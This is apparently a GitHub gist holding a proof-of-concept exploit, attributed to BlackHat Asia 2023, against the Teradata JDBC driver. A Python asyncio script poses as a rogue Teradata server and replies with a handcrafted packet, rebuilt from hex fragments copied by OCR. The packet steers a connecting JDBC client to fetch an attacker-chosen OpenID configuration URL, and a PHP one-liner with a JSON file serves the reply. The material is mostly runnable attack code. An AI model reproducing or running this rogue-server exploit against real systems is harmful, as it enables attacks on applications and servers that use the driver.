
@kaiili
Created June 1, 2023 11:21
JDBC 攻击 Teradata 的 POC，来自 BlackHat ASIA 2023
import struct
import asyncio
# The address the JDBC client will be sent to fetch.
# Final request made by the client: http://127.0.0.1:1881/.well-known/openid-configuration
# Note: len(url) is packed into a single byte further down (struct.pack("B", ...))
# and the value is encoded as ASCII, so it must stay <= 255 ASCII characters.
url = "http://127.0.0.1:1881/"
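# Joins the OCR'd fragments below into one hex string.
# "0x" is a placeholder: much of the data came from OCR, and the placeholder
# keeps the fragment lists aligned where a row is missing.
def merge_strings(arr: list, placeholder: str = "0x") -> str:
    """Concatenate fragment lists column by column, skipping placeholders.

    For every index ``i`` below ``len(arr[0])`` the cells ``arr[0][i]``,
    ``arr[1][i]``, ... are appended in that order; a cell equal to
    *placeholder* is skipped.  This is how the OCR'd packet fragments in
    ``s_list`` are stitched back into a single hex string.

    Args:
        arr: list of fragment lists.  Every inner list must be at least as
            long as ``arr[0]``; a shorter one raises ``IndexError``, extra
            trailing cells in longer lists are ignored.
        placeholder: cell value that marks an absent fragment (``"0x"``).

    Returns:
        The joined fragments, or ``""`` when ``arr`` is empty.
    """
    if not arr:  # the original indexed arr[0] unconditionally and raised IndexError
        return ""
    width = len(arr[0])
    return "".join(
        row[i]
        for i in range(width)
        for row in arr
        if row[i] != placeholder
    )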
# Packet bytes recovered by OCR from captured traffic.
# The intended way to obtain them is the official documentation or a capture
# from a production environment; because (1) the official docs are hard to
# use and (2) the VM is only available for x86, they were copied from
# existing material instead.
#
# Layout: six groups of eight hex fragments.  merge_strings() walks the
# fragment index 0..7 and, for each index, appends the fragment from every
# group in order, so group N holds the N-th slice of each packet row.  The
# "0x" entries are alignment placeholders that merge_strings() drops.
s_list = [
    [
        "0x",
        "000000002b024e000003",
        "20202020202020202020",
        "2020204e010001000154",
        "00f23000007918000000",
        "01000a001c0101010101",
        "0101000d003e31372e32",
        "28010000010001010000",
    ],
    [
        "0x",
        "e8000003e80078000177ff00000002",
        "2020202020202020f1004153434949",
        "0007008c310000640000fa00000f42",
        "260000fa000000fa000000fa000000",
        "010102010001010001010101020101",
        "302e30332e30392020202020202020",
        "010100000100010001000100000000",
    ],
    [
        "0x",
        "00000001ff000004be005554463136",
        "202020202020202020202020202020",
        "40000000007cff06000070000000ff",
        "7d0000007d000000fa000000fa0000",
        "0001010101010102000b0022010101",
        "202020202020202020202031372e32",
        "000000000000000101000100010000",
    ],
    [
        "0000000000000000000",
        "2020202020202020202",
        "2020202020202020202",
        "f80000000100000000b",
        "0009e70000000600000",
        "0101000101010101010",
        "302e30332e303920202",
        "0100100014000000000",
    ],
    [
        "000000000000000000000000100000",
        "020202020202020202020202020202",
        "0c0004542434449432020202020202",
        "f000000100000ffff0000080000000",
        "00600000006000003e8000fa00000f",
        "201010101010101000101010101010",
        "020202020202020202020202020202",
        "000000000008002000000000000000",
    ],
    [
        "00005ff0000000000000000000000",
        "0bf00555446382020202020202020",
        "02020202020202020202020202020",
        "08000000040000009e7000fa00000",
        "ffc00000fffb40000fa0000090001",
        "1010001010000000c000601000102",
        "0202020000e000403030203000f00",
        "00012002001010101010101010000",
    ],
]
# The fixed reply sent to every connecting client: the OCR'd fragments plus
# three big-endian 16-bit length fields, a one-byte length prefix and the URL.
packet_to_send = (
    bytes.fromhex("03020a0000070000")
    # Each length field is len(url) plus a constant; presumably each constant
    # is the size of the fixed bytes that follow it at that nesting level.
    # Not verified against a protocol specification here.
    + struct.pack(">H", len(url) + 899)
    + bytes.fromhex(
        merge_strings(s_list)
        + "0000000000000000000000000000000000000000000000130008010101000000000000060002014900a5"
    )
    + struct.pack(">H", len(url) + 87)
    + bytes.fromhex(
        "0000000100010005010002000811140309000300040004000600210006000400050004000700040008000400090004000a000501000b000501000c000501000e0004001000060100000f"
    )
    + struct.pack(">H", len(url) + 11)
    + bytes.fromhex("000372636500")
    # One-byte length prefix: struct.error if len(url) > 255, and
    # url.encode("ascii") raises UnicodeEncodeError on non-ASCII characters.
    + struct.pack("B", len(url))
    + url.encode("ascii")
    + bytes.fromhex(
        "00a70031000000010000000d2b06010401813f0187740101090010000c00000003000000010011000c000000010000001400a70024000000010000000c2b06010401813f01877401140011000c000000010000004600a7002100000001000000092a864886f7120102020011000c000000010000002800a7001e00000001000000062b06010505020011000c000000010000004100a70025000000010000000d2b0601040181e01a04822e01040011000c000000010000001e00a70025000000010000000d2b0601040181e01a04822e01030011000c000000010000000a"
    )
)
async def handle_connection(reader, writer):
    """Serve one client connection: send the prebuilt packet twice.

    Registered as the callback of asyncio.start_server() in main(); asyncio
    supplies a StreamReader/StreamWriter pair per accepted connection.  The
    packet is written, up to 10 bytes are read from the client and discarded
    (presumably just consuming the client's reply before the second write),
    the packet is written again and the connection is closed.  writer.close()
    is not followed by ``await writer.wait_closed()``, so the handler returns
    before the transport has actually finished shutting down.
    """
    writer.write(packet_to_send)
    await writer.drain()
    await reader.read(10)  # return value (b"" on EOF) is ignored
    writer.write(packet_to_send)
    await writer.drain()
    writer.close()
# Must be paired with an HTTP endpoint that returns a "success" JSON document.
# The author used the result.json below served by PHP's built-in server:
#   php -S 0.0.0.0:1881 result.json
async def main():
    """Listen on localhost:1025 until cancelled, dispatching each connection to handle_connection()."""
    server = await asyncio.start_server(handle_connection, "localhost", 1025)
    async with server:
        await server.serve_forever()
# Starts the listener at import time: there is no ``if __name__ == "__main__"``
# guard, so importing this module blocks here as well.
asyncio.run(main())
{
"authorization_endpoint":"a",
"token_endpoint":"2"
}